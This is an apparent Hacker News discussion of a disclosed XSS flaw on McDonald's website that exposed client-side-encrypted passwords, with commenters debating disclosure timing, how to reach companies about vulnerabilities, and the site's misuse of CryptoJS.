"Responsible disclosure" is simply a meme to reframe "instant full disclosure" as irresponsible, which is dishonest.

Do you think journalists sit on the final results of corporate negligence investigations while giving the guilty parties time to clean up their act?

Look at this bug, in particular. This is not about this bug; this is about basic negligence. It would have been completely appropriate to blog about this on day zero of discovery. This is not about "time to patch", this is about "time to convince the widest number of people that you should never trust McDonalds with your data".


> Do you think journalists sit on the final results of corporate negligence investigations while giving the guilty parties time to clean up their act?

I've worked at a newspaper. Your framing of the question is deliberately silly - they'd sit on it to prevent innocents from being harmed, not to protect the guilty.

Once it's fixed (or after a reasonable amount of time not getting fixed), then they happily nail the guilty people to the wall.


Agreed. It can take months to connect with some big companies. Reported via Twitter? Come on.

Tip: InMail on LinkedIn can be quite effective if you're having trouble. Start at the CEO and work your way down.


Is your hit rate on LinkedIn for security issues that high? Mine's in the single digits, almost as bad as email.

What do you say in your InMail messages that give you a higher response rate? Are you using premium services?


Yes, you have to pay for InMail. Just be clear and concise. It worked for a Freshdesk vuln we reported. I pinged the CEO.


That brings up an interesting question though. How long is long enough for disclosure in cases where the company has made it impossible to notify them of a vulnerability? If someone tries 10 different ways to get in touch and makes absolutely no progress it would seem that it would be better to disclose sooner rather than later.

Giving companies plenty of time to fix a vulnerability is one thing but if the company isn't even working on the issue because they've isolated all external contact at least if disclosure happens sooner that's less time that an unknown attacker can use that vulnerability without anyone being aware of the issue.


This isn't a buffer overrun that's hard to detect though, this seems like something that should have been found using more proactive measures.


No excuse. It's the middle of January now, the holidays are long over, and they're one of the biggest companies on the planet. They had plenty of time to respond.


> they're one of the biggest companies on the planet

Yeah, making hamburgers! Out of 420,000 employees, they have all of 17 IT jobs on their career site.

They deserve a break today.


I get both of you: yes, it's a big company, and yes, it's a fast-food restaurant. A company this big has a lot of workers who don't get many days off during the holidays, so mail should still be read, and IT can't just up and leave for weeks; there surely have to be a few people on standby. But the IT department probably doesn't know much about the website, and for the website makers it doesn't make sense to be available all the time. IT could still remove the login feature (shut down the login server) until after the holidays, provided that IT gets the message.

Conclusion: it's a bad excuse for a company this big, and their communications being offline for so long is bad. But it would have been reasonable to wait a little longer before disclosure; considering the mistakes made on the website, the publisher should have realised that the company hasn't put many resources into this whole security thing.


Nah, they deserved this disclosure and proof of concept today.


> Yeah, making hamburgers! Out of 420,000 employees, they have all of 17 IT jobs on their career site.

How many credit cards get swiped/waved per day at their PoS terminals? If they don't have a 24/7 infosec team they're Doing It Wrong™.


I'm not sure that agrees with the franchise model. McDonald's corporate owns the real estate, but not most of the businesses. So most of those terminals aren't actually theirs.


It's not as if franchisees can just choose to purchase whatever equipment they want. It all has to come from corporate, so corporate is the place to enforce security standards.


Oh wow. That model is atrocious in terms of providing decent security.


> Public Disclosure: 05 Jan 2017 23:31:42 GMT

Which was roughly 2-3 days after returning from New Year's.

Public release was way too early, author should have waited.


Sounds like a northern hemisphere mentality. That's likely where the team is based, but anyone not up top is doing their best to avoid work at the moment, as it's midsummer and fantastic.


McDonalds should invent some new characters like the Hackburglar and Cap'n Crook to educate the public about computer security.


Love the CryptoJS. This is how I store all my own text files on my own computer.

It's just so bizarre. What were they expecting that to achieve?


It was probably a bullet point that helped sell the agency that built the site to a McDonald's executive/manager.


> What were they expecting that to achieve?

we added a crypto for security measures. this seemed like a good place to add a crypto. it is now more secure.

In my basement I have a fingerprint+PIN protected blastproof safe bolted to the foundation. I use it to store my house keys, so that if anyone breaks into my house, they won't get access to my house.


Someone said "we need crypto" but didn't understand it as a concept.



Better title would be "Non-persistent XSS on McDonald's website through AngularJS misuse"


Is it true that having one set of usernames and passwords makes it easier to crack a set from another website?

Does every crack, or leak, of usernames and passwords make it slightly easier to crack all other databases?

Because some people still use the same password for multiple accounts.


Yes this has been researched and is true.

http://www.pcworld.com/article/219303/password_use_very_comm...


So someone wrote an angular app that stores your password in a cookie in your own browser that is encrypted client-side using cryptojs...

Hmm. Seems on par with the security of pretty much every angularjs site i've seen. Moving on.


Why the downvote? This is extremely relevant. There is no 100% security, there is no reason to store sensitive information (even "encrypted").

Had this been a session token the problem would have been less severe (session tokens won't be reused on the user's Gmail account for instance), easier to detect, and easier to mitigate once discovered.


> Why the downvote?

Probably because of this:

> Hmm. Seems on par with the security of pretty much every angularjs site i've seen. Moving on.


Interesting: how many users with a password like '123' or 'monkey' does McDonald's have? Like 50%? Because who would give such a website a proper password?! ;)


I wonder if this affects MyMcDs.ca in Canada.


ADs are getting smarter


What are those?


HN next week: "stealing voucher tickets from Chuck E. Cheese"

Sweet sweet karma from some low hanging fruit never hurt eh? :)


The explanation in itself, regardless of 'impact', is already instructive and worth an HN post, in my opinion.

The timeline at the bottom was informative as well; it shows that even (or maybe especially) for an organisation as big as theirs, it is hard to get the problem to the right place in the enterprise, and/or respond to it, and/or solve it.


Curious! Ten days after a public disclosure, and no statement from McDonald's? Have they fixed the problem? Do they not know?



